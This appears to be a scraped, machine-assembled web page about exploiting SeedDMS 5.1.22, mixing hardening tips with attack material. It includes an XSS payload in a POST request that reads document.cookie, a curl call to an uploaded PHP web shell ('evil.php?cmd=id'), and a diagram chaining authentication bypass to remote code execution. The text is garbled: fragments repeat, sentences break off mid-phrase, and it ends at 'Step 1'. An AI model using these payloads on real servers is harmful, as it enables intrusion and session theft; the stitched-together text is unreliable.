Seeddms 5.1.22 | Exploit

Audit your user roles. Ensure that only highly trusted users have the permission to "Add Documents" or "Manage Extensions."

SeedDMS 5.1.22 is a specific release of the document management system that, while functional, has been identified as particularly vulnerable to a range of security exploits. The version number often surfaces in security write-ups and CTF (Capture The Flag) challenges, making it a critical point of reference for security professionals and penetration testers.

: Review all existing user accounts for unauthorized low-level users who might have the "write" permissions required to upload documents. seeddms 5.1.22 exploit

POST /seeddms/op/op.AddEvent.php HTTP/1.1 Host: target-dms.local ... name=Q4_Report&comment=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E Use code with caution.

Recursively search for PHP files in the data/ directory: Audit your user roles

curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id"

If the web server is configured to execute PHP files (default for SeedDMS), an uploaded web shell—e.g., shell.php —placed within the data/ directory or its subfolders, can be accessed directly via HTTP. The attacker then gains the privileges of the web server user (commonly www-data ). : Review all existing user accounts for unauthorized

[Unauthenticated Attacker] │ ▼ [Bypass Authentication (CVE-2019-12745)] │ ▼ [Gain Admin Session] │ ▼ [Upload Malicious PHP Shell] │ ▼ [Execute Remote Code (RCE)] Step 1: Session Hijacking and Authentication Bypass